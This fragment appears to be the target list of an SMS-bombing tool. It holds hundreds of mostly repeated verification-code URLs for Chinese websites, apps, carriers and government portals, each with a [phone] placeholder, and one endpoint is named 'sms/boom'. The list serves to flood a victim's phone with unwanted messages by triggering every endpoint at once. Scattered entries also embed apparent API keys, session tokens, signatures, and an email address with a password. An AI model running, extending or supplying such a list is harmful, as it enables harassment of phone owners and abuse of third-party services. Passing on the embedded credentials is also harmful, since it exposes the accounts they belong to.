"http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", - "http://dafeiyu.cn/sms/boom?mobile=[phone]&config=1&num=2", - "http://buckle.lvronghui.com/promotion/transfer.php?phone=[phone]", - "http://renjie.houhan.com/api/Register/send_sms?mobile=[phone]&host=renjie.houhan.com", - "http://jiuji.lyqchain.cn/Api/System/SendMsgCode?format=json?Tel=[phone]", - "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", - "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", - "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", - "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", - "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", - "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", - "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "https://h5.youzan.com/usercenter/member/member/mobilesmscode.json?kdt_id=19161003&mobile=[phone]&verify_times=1", - "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://micservice.91qinqu.com/huieryun-identity/api/v1/authgateway/91qq/sendsms?mobile=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://ucenter.inyuapp.com/v1/login/mobile/code?mobile=[phone]&country_code=86", - "http://sms.321mh.com/user/v1/sendsms?mobile=[phone]&service=zymk&countryCode=&imgCode=&refresh=0&localtime=&client-channel=store_tencent&loglevel=3&client-type=android&client-version=4.9.1", - "http://ndapi.nexttao.com/api/user/request_mobile_code?mobile=[phone]", - "http://bank.wo.cn/hand/getRandCode?phone=[phone]&flag=3", - "http://home.ecook.cn/user/code?phone=[phone]", - "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", - "https://user.qunar.com/webApi/logincode.jsp?mobile=[phone]&vcode=&origin=wechat$$&action=register&type=implicit", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", - "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", - "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", - "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]&source=verify", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]&type=register&_=1582428078447", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "https://www.guiji.ai/market/sms?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.faka866.com/index/checkuser?Mobile=[phone]&act=sj_reg_telma&t=1589617288409", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://dxhz.xqapi.live/api.php?id=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", - "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://wx.fowep.com/iwater/v1/usercenter/nt/sendAuthCode/v2.json?requestPara=%7B%22mobile%22:%22[phone]%22,%22type%22:1,%22token%22:null,%22waterCorpId%22:3,%22UNID%22:%22%22,%22areaId%22:0,%22accountType%22:%22XJ%22,%22apiType%22:%22PC%22,%22appVersion%22:%221.0.2%22%7D", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8,1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://www.1314.buzz/index.php?hm=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]&needcode=false", - "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://ccyagu.gswanzhong.com:80/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - 